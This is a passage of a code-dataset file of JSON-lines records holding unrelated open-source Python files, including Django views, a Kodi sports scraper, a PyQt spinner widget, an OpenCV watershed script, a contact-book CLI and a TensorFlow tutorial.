\n \"\"\n year = 2021\n while year <= 2050:\n\n if year % 2==0:\n html += f\"
{str(year)}
\"\n \n year += 1\n\n html+=\"
\"\n \"\"\"\n\n year = 2021\n hasta = range(year,2051)\n\n nombre=\"Bryan\"\n lenguajes=['JavaScript','Python','PHP','C']\n\n return render(request,'index.html', {\n 'title':'Inicio 2', \n 'mi_variable':'Soy un dato que esta en la vista',\n 'nombre':nombre,\n 'lenguajes':lenguajes,\n 'years':hasta\n })\n\ndef hola_mundo(request):\n return render(request,'hola_mundo.html')\n\ndef pagina(request,redirigir = 0):\n\n if redirigir ==1:\n #return redirect('/contacto/bryan/pintado')\n return redirect('contacto',nombre='Bryan',apellido='Pintado')\n\n return render(request,'pagina.html',{\n 'texto':''\n })\n\ndef contacto(request,nombre=\"\",apellido=\"\"):\n html=\"\"\n if nombre and apellido:\n html += \"
El nombre completo es:
\"\n html += f\"
{nombre} {apellido}
\"\n\n return HttpResponse(layout+f\"
Contacto
\"+html)\n\ndef crear_articulo(request):\n articulo = Article(\n title = 'Primer Articulo',\n content = 'Contenido del articulo',\n public = True\n )\n\n articulo.save()\n return HttpResponse(f\"Articulo Creado: {articulo.title}-{articulo.content} \")\n\n ","repo_name":"Bryan9696/Proyecto-Python","sub_path":"22-django/AprendiendoDjango/miapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"20756207073","text":"\"\"\"\nLet A and B be two sequences of n integers each. Given an integer m,\ndescribe an O(n*log(n))-time algorithm for determining if there is an integer a\nin A and integer b in B such that m = a + b.\n\"\"\"\n\n\ndef check_sum(A, B, m):\n h = {}\n\n for a in A: # O(n)\n h.setdefault(m - a, 1)\n\n for b in B: # O(n)\n if h.get(b) == 1:\n return True\n return False\n\nif __name__ == \"__main__\":\n A = [1, 3, 5]\n B = [2, 4, 6]\n m = 7\n\n result = check_sum(A, B, m)\n assert result == True\n","repo_name":"aleksandarbos/solutions-for-data-structures-and-algorithms-in-python","sub_path":"c-12.46.py","file_name":"c-12.46.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"30728860213","text":"\"\"\"\nfaça um programa que simula o lançamento de dois dados n\nvezes e tenha como saída:\n- o número de cada dado\n- a relação entre eles (>, <, =) de cada lançamento\n\"\"\"\n\nfrom random import randint\n\nn = int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n\nwhile n != 2:\n d1 = randint(1, 6)\n d2 = randint(1, 6)\n\n if d1 > d2:\n print(f\"O resultado é {d1} > {d2}.\")\n n= int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n elif d1 < d2:\n print(f\"O resultado é {d1} < {d2}.\")\n n = int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n elif d1 == d2:\n print(f\"O resultado é {d1} = {d2}.\")\n n = int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n","repo_name":"SouzaCadu/guppe","sub_path":"Secao_06_Lista_Ex_62e/ex_32.py","file_name":"ex_32.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"17030600107","text":"from genetic import GeneticAlgorithm\nfrom utils.functions import load_instance, overlap, add_dummy_dlo\n\nif __name__ == '__main__':\n INSTANCE = 'test_complete'\n dtos, ars, constants, paws, dlos = load_instance(INSTANCE)\n\n initial_dlos = dlos\n\n # get rid of dtos overlapping with paws and dlos\n filtered_dtos = []\n for dto in dtos:\n skip = False\n for event in paws + dlos:\n if overlap(dto, event):\n skip = True\n break\n if not skip:\n filtered_dtos.append(dto)\n\n dtos = sorted(filtered_dtos, key=lambda dto_: dto_['start_time'])\n dlos = sorted(dlos, key=lambda dlo_: dlo_['start_time'])\n\n # add the dummy variable for the correct\n dlos = add_dummy_dlo(dtos, dlos)\n\n CAPACITY = constants['MEMORY_CAP']\n DOWNLINK_RATE = constants['DOWNLINK_RATE']\n\n for i, ar in enumerate(ars):\n ar['index'] = i\n\n for i, dto in enumerate(dtos):\n dto['priority'] = next((ar['rank'] for ar in ars if ar['id'] == dto['ar_id']), None)\n dto['ar_index'] = next((ar['index'] for ar in ars if ar['id'] == dto['ar_id']), None)\n\n ga = GeneticAlgorithm(CAPACITY, dtos, ars, dlos, DOWNLINK_RATE)\n ga.run()\n ga.print_population()\n ga.plot_fitness_values()\n\n solution = ga.get_best_solution()\n solution.plot_memory()\n\n print(f'Best solution: {solution}')\n","repo_name":"Mala1180/satellites-optimization-algorithms","sub_path":"heuristic/complete_problem.py","file_name":"complete_problem.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"10775516293","text":"import pickle\n\nfrom hydrus.core import HydrusData\nfrom hydrus.core import HydrusSerialisable\nfrom hydrus.core import HydrusTime\n\nfrom hydrus.client.networking import ClientNetworkingSessions\n\nclass NetworkSessionManagerLegacy( HydrusSerialisable.SerialisableBase ):\n \n SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER_LEGACY\n SERIALISABLE_NAME = 'Legacy Session Manager'\n SERIALISABLE_VERSION = 1\n \n SESSION_TIMEOUT = 60 * 60\n \n def __init__( self ):\n \n HydrusSerialisable.SerialisableBase.__init__( self )\n \n self._network_contexts_to_sessions = {}\n \n \n def _GetSerialisableInfo( self ):\n \n serialisable_network_contexts_to_sessions = [ ( network_context.GetSerialisableTuple(), pickle.dumps( session ).hex() ) for ( network_context, session ) in list(self._network_contexts_to_sessions.items()) ]\n \n return serialisable_network_contexts_to_sessions\n \n \n def _InitialiseFromSerialisableInfo( self, serialisable_info ):\n \n serialisable_network_contexts_to_sessions = serialisable_info\n \n for ( serialisable_network_context, pickled_session_hex ) in serialisable_network_contexts_to_sessions:\n \n network_context = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_network_context )\n \n try:\n \n session = pickle.loads( bytes.fromhex( pickled_session_hex ) )\n \n except:\n \n # new version of requests uses a diff format, wew\n \n continue\n \n \n session.cookies.clear_session_cookies()\n \n self._network_contexts_to_sessions[ network_context ] = session\n \n \n \n def GetData( self ):\n \n return self._network_contexts_to_sessions\n \n \nHydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER_LEGACY ] = NetworkSessionManagerLegacy\n\ndef ConvertLegacyToNewSessions( legacy_session_manager: NetworkSessionManagerLegacy ):\n \n session_containers = []\n \n network_contexts_to_sessions = legacy_session_manager.GetData()\n \n for ( network_context, session ) in network_contexts_to_sessions.items():\n \n session_container_name = HydrusData.GenerateKey().hex()\n \n session_container = ClientNetworkingSessions.NetworkSessionManagerSessionContainer( session_container_name, network_context = network_context, session = session )\n \n session_containers.append( session_container )\n \n \n session_manager = ClientNetworkingSessions.NetworkSessionManager()\n \n session_manager.SetSessionContainers( session_containers, set_all_sessions_dirty = True )\n \n session_manager.SetDirty()\n \n return session_manager\n \n","repo_name":"hydrusnetwork/hydrus","sub_path":"hydrus/client/networking/ClientNetworkingSessionsLegacy.py","file_name":"ClientNetworkingSessionsLegacy.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":1987,"dataset":"github-code","pt":"2"}
+{"seq_id":"22143313821","text":"# -*- coding: UTF-8 -*-\n#\n\n\"\"\"Plugin route actions\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport sys\nimport json\nimport urllib.parse\nimport xbmcgui\nimport xbmcplugin\nfrom . import tsdb, data_utils, cache\nfrom .utils import logger\ntry:\n from typing import Optional, Text, Union, ByteString # pylint: disable=unused-import\nexcept ImportError:\n pass\n\nHANDLE = int(sys.argv[1]) # type: int\n\n\ndef find_show(title):\n # type: (Union[Text, bytes]) -> None\n \"\"\"Find a show by title\"\"\"\n if not isinstance(title, str):\n title = title.decode('utf-8')\n logger.debug('Searching for sports event {}'.format(title))\n search_results = tsdb.search_show(title)\n for search_result in search_results:\n show_name = search_result.get('strLeague')\n list_item = xbmcgui.ListItem(show_name, offscreen=True)\n list_item = data_utils.add_main_show_info(\n list_item, search_result, full_info=False)\n # Below \"url\" is some unique ID string (may be an actual URL to a show page)\n # that is used to get information about a specific league.\n xbmcplugin.addDirectoryItem(\n HANDLE,\n url=str(search_result['idLeague']),\n listitem=list_item,\n isFolder=True\n )\n\n\ndef get_show_id_from_nfo(nfo):\n # type: (Text) -> None\n \"\"\"\n Get show ID by NFO file contents\n\n This function is called first instead of find_show\n if a NFO file is found in a TV show folder.\n\n :param nfo: the contents of a NFO file\n \"\"\"\n if isinstance(nfo, bytes):\n nfo = nfo.decode('utf-8', 'replace')\n logger.debug('Parsing NFO file:\\n{}'.format(nfo))\n parse_result = data_utils.parse_nfo_url(nfo)\n if parse_result:\n if parse_result.provider == 'thesportsdb':\n show_info = tsdb.load_show_info(parse_result.show_id)\n else:\n show_info = None\n if show_info is not None:\n list_item = xbmcgui.ListItem(\n show_info['strLeague'], offscreen=True)\n # \"url\" is some string that unique identifies a league.\n # It may be an actual URL of a TV show page.\n xbmcplugin.addDirectoryItem(\n HANDLE,\n url=str(show_info['idLeague']),\n listitem=list_item,\n isFolder=True\n )\n\n\ndef get_details(show_id):\n # type: (Text) -> None\n \"\"\"Get details about a specific league\"\"\"\n logger.debug('Getting details for league id {}'.format(show_id))\n show_info = tsdb.load_show_info(show_id)\n if show_info is not None:\n list_item = xbmcgui.ListItem(show_info['strLeague'], offscreen=True)\n list_item = data_utils.add_main_show_info(\n list_item, show_info, full_info=True)\n xbmcplugin.setResolvedUrl(HANDLE, True, list_item)\n else:\n xbmcplugin.setResolvedUrl(\n HANDLE, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef get_episode_list(show_ids):\n # type: (Text) -> None\n \"\"\"Get games in a league\"\"\"\n # Kodi has a bug: when a show directory contains an XML NFO file with\n # episodeguide URL, that URL is always passed here regardless of\n # the actual parsing result in get_show_from_nfo()\n # so much of this weird logic is to deal with that\n try:\n all_ids = json.loads(show_ids)\n show_id = all_ids.get('tsdb')\n except (ValueError, AttributeError):\n show_id = str(show_ids)\n if show_id.isdigit():\n logger.error(\n 'using deprecated episodeguide format, this league should be refreshed or rescraped')\n if not show_id:\n raise RuntimeError(\n 'No The SportsDB league id found in episode guide, this league should be refreshed or rescraped')\n elif not show_id.isdigit():\n parsed = False\n parse_result = data_utils.parse_nfo_url(show_id)\n if parse_result:\n if 
parse_result.provider == 'thesportsdb':\n show_info = tsdb.load_show_info(parse_result.show_id)\n parsed = True\n if not parsed:\n raise RuntimeError(\n 'No SportsDB league id found in episode guide, this league should be refreshed or rescraped')\n logger.debug('Getting event list for sports show id {}'.format(show_id))\n show_info = tsdb.load_show_info(show_id)\n if show_info is not None:\n idLeague = show_info.get('idLeague', 0)\n seasons = show_info.get('seasons')\n if not seasons:\n seasons = show_info['seasons'] = data_utils._add_season_info(\n show_info, None)\n event_list = []\n for season in seasons:\n events = tsdb.load_season_episodes(\n idLeague, season.get('season_name', ''))\n if events:\n ep_num = 1\n for event in events:\n event['strEpisode'] = str(ep_num)\n event['strLeague'] = show_info.get('strLeague', '')\n event_list.append(event)\n encoded_ids = urllib.parse.urlencode(\n {'show_id': idLeague, 'episode_id': event.get('idEvent', 0)})\n list_item = xbmcgui.ListItem(\n event.get('strEvent', ''), offscreen=True)\n list_item = data_utils.add_episode_info(\n list_item, event, full_info=False)\n # Below \"url\" is some unique ID string (may be an actual URL to an episode page)\n # that allows to retrieve information about a specific episode.\n url = urllib.parse.quote(encoded_ids)\n xbmcplugin.addDirectoryItem(\n HANDLE,\n url=url,\n listitem=list_item,\n isFolder=True\n )\n ep_num = ep_num + 1\n show_info['event_list'] = event_list\n cache.cache_show_info(show_info)\n\n\ndef get_episode_details(encoded_ids): # pylint: disable=missing-docstring\n # type: (Text) -> None\n \"\"\"Get details about a specific game\"\"\"\n encoded_ids = urllib.parse.unquote(encoded_ids)\n decoded_ids = dict(urllib.parse.parse_qsl(encoded_ids))\n logger.debug('Getting event details for {}'.format(decoded_ids))\n episode_info = tsdb.load_episode_info(\n decoded_ids['show_id'], decoded_ids['episode_id']\n )\n if episode_info:\n list_item = xbmcgui.ListItem(\n episode_info.get('strEvent', ''), offscreen=True)\n list_item = data_utils.add_episode_info(\n list_item, episode_info, full_info=True)\n xbmcplugin.setResolvedUrl(HANDLE, True, list_item)\n else:\n xbmcplugin.setResolvedUrl(\n HANDLE, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef get_artwork(show_id):\n # type: (Text) -> None\n \"\"\"\n Get available artwork for a show\n\n :param show_id: default unique ID set by setUniqueIDs() method\n \"\"\"\n if not show_id:\n return\n logger.debug('Getting artwork for show ID {}'.format(show_id))\n show_info = tsdb.load_show_info(show_id)\n if show_info is not None:\n list_item = xbmcgui.ListItem(\n show_info.get('strLeague', ''), offscreen=True)\n list_item = data_utils.set_show_artwork(show_info, list_item)\n xbmcplugin.setResolvedUrl(HANDLE, True, list_item)\n else:\n xbmcplugin.setResolvedUrl(\n HANDLE, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef router(paramstring):\n # type: (Text) -> None\n \"\"\"\n Route addon calls\n\n :param paramstring: url-encoded query string\n :raises RuntimeError: on unknown call action\n \"\"\"\n params = dict(urllib.parse.parse_qsl(paramstring))\n logger.debug('Called addon with params: {}'.format(sys.argv))\n if params['action'] == 'find':\n logger.debug('performing find action')\n find_show(params['title'])\n elif params['action'].lower() == 'nfourl':\n logger.debug('performing nfourl action')\n get_show_id_from_nfo(params['nfo'])\n elif params['action'] == 'getdetails':\n logger.debug('performing getdetails action')\n get_details(params['url'])\n elif 
params['action'] == 'getepisodelist':\n logger.debug('performing getepisodelist action')\n get_episode_list(params['url'])\n elif params['action'] == 'getepisodedetails':\n logger.debug('performing getepisodedetails action')\n get_episode_details(params['url'])\n elif params['action'] == 'getartwork':\n logger.debug('performing getartwork action')\n get_artwork(params.get('id'))\n else:\n raise RuntimeError('Invalid addon call: {}'.format(sys.argv))\n xbmcplugin.endOfDirectory(HANDLE)\n","repo_name":"pkscout/metadata.tvshows.thesportsdb.python","sub_path":"libs/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"14802483956","text":"import sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtWidgets import QSizePolicy\n\n\nclass QProgressIndicator(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n self._angle = 0\n self._timerId = -1\n self._delay = 40\n self._displayedWhenStopped = False\n self._color = QtGui.QColor(Qt.black)\n\n self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.setFocusPolicy(Qt.NoFocus)\n\n def animationDelay(self):\n return self._delay\n\n def isAnimated(self):\n return self._timerId != -1\n\n def isDisplayedWhenStopped(self):\n return self._displayedWhenStopped\n\n def color(self):\n return self._color\n\n def sizeHint(self):\n return QtCore.QSize(20, 20)\n\n def heightForWidth(self, w):\n return w\n\n @pyqtSlot()\n def startAnimation(self):\n self._angle = 0\n\n if self._timerId == -1:\n self._timerId = self.startTimer(self._delay)\n\n @pyqtSlot()\n def stopAnimation(self):\n if self._timerId != -1:\n self.killTimer(self._timerId)\n\n self._timerId = -1\n\n self.update()\n\n @pyqtSlot(int)\n def setAnimationDelay(self, delay):\n if self._timerId != -1:\n self.killTimer(self._timerId)\n\n self._delay = delay\n\n if self._timerId != -1:\n self._timerId = self.startTimer(self._delay)\n\n @pyqtSlot(bool)\n def setDisplayedWhenStopped(self, state):\n self._displayedWhenStopped = state\n\n self.update()\n\n @pyqtSlot(QtGui.QColor)\n def setColor(self, color):\n self._color = color\n\n self.update()\n\n def timerEvent(self, event):\n self._angle = (self._angle + 30) % 360\n\n self.update()\n\n def paintEvent(self, event):\n if not self._displayedWhenStopped and not self.isAnimated():\n return\n\n width = min(self.width(), self.height())\n\n p = QPainter(self)\n p.setRenderHint(QPainter.Antialiasing)\n\n outerRadius = int((width-1)*0.5)\n innerRadius = int((width-1)*0.5*0.38)\n\n capsuleHeight = int(outerRadius - innerRadius)\n capsuleWidth = int(capsuleHeight * 0.23 if (width > 32)\n else capsuleHeight * 0.35)\n capsuleRadius = int(capsuleWidth/2)\n\n for i in range(12):\n color = self._color\n color.setAlphaF(1.0 - (i/12.0))\n p.setPen(Qt.NoPen)\n p.setBrush(color)\n p.save()\n p.translate(self.rect().center())\n p.rotate(self._angle - i * 30.0)\n p.drawRoundedRect(-capsuleWidth*0.5,\n -(innerRadius+capsuleHeight),\n capsuleWidth,\n capsuleHeight,\n capsuleRadius,\n capsuleRadius)\n p.restore()\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n mw = QtWidgets.QMainWindow()\n\n pi = QProgressIndicator()\n\n frame = QtWidgets.QFrame()\n\n vbl = QtWidgets.QVBoxLayout()\n\n startPb = QtWidgets.QPushButton(\"start spin\")\n startPb.clicked.connect(pi.startAnimation)\n\n stopPb = QtWidgets.QPushButton(\"stop spin\")\n stopPb.clicked.connect(pi.stopAnimation)\n\n delaySlider = QtWidgets.QSlider()\n delaySlider.setRange(0, 100)\n delaySlider.setValue(pi.animationDelay())\n delaySlider.setOrientation(Qt.Horizontal)\n delaySlider.valueChanged.connect(pi.setAnimationDelay)\n\n vbl.addWidget(startPb)\n vbl.addWidget(stopPb)\n vbl.addWidget(delaySlider)\n\n hbl = QtWidgets.QHBoxLayout(frame)\n hbl.addWidget(pi)\n hbl.addLayout(vbl)\n\n pi.startAnimation()\n\n mw.setCentralWidget(frame)\n\n mw.show()\n 
sys.exit(app.exec_())\n","repo_name":"dnaga392/QProgressIndicator","sub_path":"qprogressindicator.py","file_name":"qprogressindicator.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"74312500207","text":"import unittest\nimport random\nimport os\nimport box\n\n\nclass TestBox(unittest.TestCase):\n def test_boxplot(self):\n rand1 = [random.randint(0, 10) for i in range(10)]\n rand2 = [random.randint(0, 10) for i in range(10)]\n rand3 = [random.randint(0, 10) for i in range(10)]\n data = [[rand1, rand2, rand3]]\n meta = ['rand1', 'rand2', 'rand3']\n title = ['Random Number Distribution']\n box.boxplot(data, meta, 'Random Numbers', title, 'rand.png')\n self.assertTrue(os.path.exists('rand.png'))\n os.remove('rand.png')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cu-swe4s-fall-2019/workflow-rymo1354","sub_path":"test_box.py","file_name":"test_box.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"10003567087","text":"\"\"\"\nProject: Farnsworth\n\nAuthor: Karandeep Singh Nagra\n\nURLs for legacy Kingman site.\n\"\"\"\n\n\nfrom django.conf.urls import url\n\nfrom legacy import views\n\n\nurlpatterns = [\n url(r'^legacy/notes/$', views.legacy_notes_view, name='notes'),\n url(r'^legacy/events/$', views.legacy_events_view, name='events'),\n url(r'^legacy/(?P[-\\w]+)/$', views.legacy_requests_view,\n name='requests'),\n]\n","repo_name":"knagra/farnsworth","sub_path":"legacy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"}
+{"seq_id":"12999134944","text":"import cv2 as cv\nimport numpy as np\n\nfrom scipy.ndimage import label\nfrom cv04.cv04 import img_read\nfrom cv07.cv07 import find_mass_center\nfrom cv3.cv3 import show_img\n\n\ndef main():\n img = img_read(\"cv10_mince.jpg\")\n gray = cv.cvtColor(img, cv.COLOR_RGB2GRAY)\n filterSize = (12, 12)\n kernel = cv.getStructuringElement(cv.MORPH_RECT, filterSize)\n\n gray = gray - cv.morphologyEx(gray, cv.MORPH_TOPHAT, kernel)\n gray = gray - cv.morphologyEx(gray, cv.MORPH_TOPHAT, kernel)\n show_img(gray, \"gray\")\n\n ret, thresh = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV + cv.THRESH_OTSU)\n kernel = np.ones((3, 3))\n thresh = cv.erode(cv.dilate(thresh, kernel, iterations=5), kernel, iterations=5)\n show_img(thresh, \"thresh\")\n # noise removal\n kernel = np.ones((3, 3), np.uint8)\n opening = cv.morphologyEx(thresh, cv.MORPH_OPEN, kernel, iterations=2)\n # sure background area\n sure_bg = cv.dilate(opening, kernel, iterations=3)\n # Finding sure foreground area\n dist_transform = cv.distanceTransform(opening, cv.DIST_L2, 5)\n ret, sure_fg = cv.threshold(dist_transform, 0.7 * dist_transform.max(), 255, 0)\n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv.subtract(sure_bg, sure_fg)\n\n # Marker labelling\n ret, markers = cv.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers + 1\n # Now, mark the region of unknown with zero\n markers[unknown == 255] = 0\n show_img(markers, \"markers\")\n markers = cv.watershed(img, markers)\n # img[markers == -1] = [255, 0, 0]\n markers[markers < 1] = 0\n show_img(markers)\n m = markers.max()\n c = find_mass_center(markers, range(2, m + 1), img)\n\n show_img(c, \"center\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aliakseikalosha/AllTaskFromTUL","sub_path":"TUL/20212022/UZO/cv10/cv10.py","file_name":"cv10.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"30118394480","text":"from decorators import input_error\nfrom custom_exceptions import (\n MissingName, MissingPhoneNumber, NameCannotBeNumeric, NoData, PhoneNotFound, IncorrectPhoneFormat,\n NoDataFound, DuplicateEntry\n)\n\n\ndef parse_input(user_input):\n if not user_input.strip():\n return None,\n command, *args = user_input.split()\n command = command.lower().strip()\n return command, args\n\n\n@input_error\ndef add_contact(args, contacts):\n if len(args) == 0:\n raise MissingName()\n\n if len(args) == 1:\n name = args[0]\n if name.isdigit():\n raise NameCannotBeNumeric()\n else:\n raise MissingPhoneNumber()\n\n name, phone = args\n\n if name.isdigit():\n raise NameCannotBeNumeric()\n\n if not phone.isdigit() or len(phone) != 10:\n raise IncorrectPhoneFormat()\n\n if name in contacts:\n raise DuplicateEntry()\n\n contacts[name] = phone\n return \"Contact added.\"\n\n\n@input_error\ndef change_contact(args, contacts):\n name, phone = args\n if not phone.isdigit() or len(phone) != 10:\n raise IncorrectPhoneFormat()\n\n if name not in contacts:\n raise PhoneNotFound\n contacts[name] = phone\n return \"Contact updated.\"\n\n\n@input_error\ndef show_phone(args, contacts):\n if not args:\n raise NoData\n name = args[0]\n if name not in contacts:\n raise PhoneNotFound\n return contacts[name]\n\n\n@input_error\ndef show_all(contacts):\n if not contacts:\n raise NoDataFound\n return '\\n'.join(f'{name}: {phone}' for name, phone in contacts.items())\n\n\ndef show_help():\n print(\"\\nInstructions:\")\n print('1. To add a contact, type: add \"name\" \"phone number\"')\n print('2. To change a contact\\'s phone number, type: change \"name\" \"new phone number\"')\n\n\ndef main():\n print(\"Welcome to the assistant bot! Type 'help' to see available commands.\")\n contacts = {}\n while True:\n try:\n user_input = input(\"Enter a command: \")\n if user_input.strip() == \"\":\n print(\"You didn't enter anything.\")\n continue\n\n command, args = parse_input(user_input)\n\n if command in [\"close\", \"exit\"]:\n print(\"Good bye!\")\n break\n elif command == \"help\":\n show_help()\n elif command == \"hello\":\n print(\"How can I help you?\")\n elif command == \"add\":\n print(add_contact(args, contacts))\n elif command == \"change\":\n print(change_contact(args, contacts))\n elif command == \"phone\":\n print(show_phone(args, contacts))\n elif command == \"all\":\n print(show_all(contacts))\n else:\n print(\"Invalid command.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LozytskyiA/goitneo-python-hw-2-group5","sub_path":"help_bot.py","file_name":"help_bot.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71055990767","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport tensorflow as tf\n\n\n# In[2]:\n\n\n# you have to specify the type\nA = tf.placeholder(tf.float32, shape=(5, 5), name='A')\n\n\n# but shape and name are optional\nv = tf.placeholder(tf.float32)\n\n\n# I think this name is more appropriate than 'dot'\nw = tf.matmul(A, v)\n\n\n# In[3]:\n\n\n# similar to Theano, you need to \"feed\" the variables values.\n# In TensorFlow you do the \"actual work\" in a \"session\".\n\nwith tf.Session() as session:\n # the values are fed in via the appropriately named argument \"feed_dict\"\n # v needs to be of shape=(5, 1) not just shape=(5,)\n # it's more like \"real\" matrix multiplication\n output = session.run(w, feed_dict={A: np.random.randn(5, 5), v: np.random.randn(5, 1)})\n\n # what's this output that is returned by the session? let's print it\n print(output, type(output))\n \n # luckily, the output type is just a numpy array. back to safety!\n\n\n# In[4]:\n\n\n# A tf variable can be initialized with a numpy array or a tf array\n# or more correctly, anything that can be turned into a tf tensor\nshape = (2, 2)\nx = tf.Variable(tf.random_normal(shape))\n# x = tf.Variable(np.random.randn(2, 2))\nt = tf.Variable(0) # a scalar\n\n\n# In[5]:\n\n\n# you need to \"initialize\" the variables first\ninit = tf.global_variables_initializer()\n\n\n# In[6]:\n\n\nwith tf.Session() as session:\n out = session.run(init) # and then \"run\" the init operation\n print(out) # it's just None\n\n # eval() in tf is like get_value() in Theano\n print(x.eval()) # the initial value of x\n print(t.eval())\n\n\n# In[8]:\n\n\n# let's now try to find the minimum of a simple cost function like we did in Theano\nu = tf.Variable(20.0)\ncost = u*u + u + 1.0\n\n# One difference between Theano and TensorFlow is that you don't write the updates\n# yourself in TensorFlow. You choose an optimizer that implements the algorithm you want.\n# 0.3 is the learning rate. 
Documentation lists the params.\ntrain_op = tf.train.GradientDescentOptimizer(0.3).minimize(cost)\n\n\n# In[11]:\n\n\n# let's run a session again\ninit = tf.global_variables_initializer()\nwith tf.Session() as session:\n session.run(init)\n\n # Strangely, while the weight update is automated, the loop itself is not.\n # So we'll just call train_op until convergence.\n # This is useful for us anyway since we want to track the cost function.\n for i in range(12):\n session.run(train_op)\n print(\"i = %d, cost = %.3f, u = %.3f\" % (i, cost.eval(), u.eval()))\n\n\n# In[12]:\n\n\ndef error_rate(p, t):\n return np.mean(p != t)\n\n\n# In[14]:\n\n\nfrom util import get_normalized_data, y2indicator\n\n# step 1: get the data and define all the usual variables\nX, Y = get_normalized_data()\n\nmax_iter = 15\nprint_period = 10\n\nlr = 0.00004\nreg = 0.01\n\nXtrain = X[:-1000,]\nYtrain = Y[:-1000]\nXtest = X[-1000:,]\nYtest = Y[-1000:]\nYtrain_ind = y2indicator(Ytrain)\nYtest_ind = y2indicator(Ytest)\n\nN, D = Xtrain.shape\nbatch_sz = 500\nn_batches = N // batch_sz\n\n# add an extra layer just for fun\nM1 = 300\nM2 = 100\nK = 10\nW1_init = np.random.randn(D, M1) / 28\nb1_init = np.zeros(M1)\nW2_init = np.random.randn(M1, M2) / np.sqrt(M1)\nb2_init = np.zeros(M2)\nW3_init = np.random.randn(M2, K) / np.sqrt(M2)\nb3_init = np.zeros(K)\n\n\n# In[15]:\n\n\n# define variables and expressions\nX = tf.placeholder(tf.float32, shape=(None, D), name='X')\nT = tf.placeholder(tf.float32, shape=(None, K), name='T')\nW1 = tf.Variable(W1_init.astype(np.float32))\nb1 = tf.Variable(b1_init.astype(np.float32))\nW2 = tf.Variable(W2_init.astype(np.float32))\nb2 = tf.Variable(b2_init.astype(np.float32))\nW3 = tf.Variable(W3_init.astype(np.float32))\nb3 = tf.Variable(b3_init.astype(np.float32))\n\n\n# In[16]:\n\n\n# define the model\nZ1 = tf.nn.relu( tf.matmul(X, W1) + b1 )\nZ2 = tf.nn.relu( tf.matmul(Z1, W2) + b2 )\nYish = tf.matmul(Z2, W3) + b3 # remember, the cost function does the softmaxing! 
weird, right?\n\n\n# In[17]:\n\n\n# softmax_cross_entropy_with_logits take in the \"logits\"\n# if you wanted to know the actual output of the neural net,\n# you could pass \"Yish\" into tf.nn.softmax(logits)\ncost = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(logits=Yish, labels=T))\n\n\n# In[20]:\n\n\n# we choose the optimizer but don't implement the algorithm ourselves\n# let's go with RMSprop, since we just learned about it.\n# it includes momentum!\ntrain_op = tf.train.RMSPropOptimizer(lr, decay=0.99, momentum=0.9).minimize(cost)\n\n# we'll use this to calculate the error rate\npredict_op = tf.argmax(Yish, 1)\n\n\n# In[21]:\n\n\ncosts = []\ninit = tf.global_variables_initializer()\nwith tf.Session() as session:\n session.run(init)\n\n for i in range(max_iter):\n for j in range(n_batches):\n Xbatch = Xtrain[j*batch_sz:(j*batch_sz + batch_sz),]\n Ybatch = Ytrain_ind[j*batch_sz:(j*batch_sz + batch_sz),]\n\n session.run(train_op, feed_dict={X: Xbatch, T: Ybatch})\n if j % print_period == 0:\n test_cost = session.run(cost, feed_dict={X: Xtest, T: Ytest_ind})\n prediction = session.run(predict_op, feed_dict={X: Xtest})\n err = error_rate(prediction, Ytest)\n print(\"Cost / err at iteration i=%d, j=%d: %.3f / 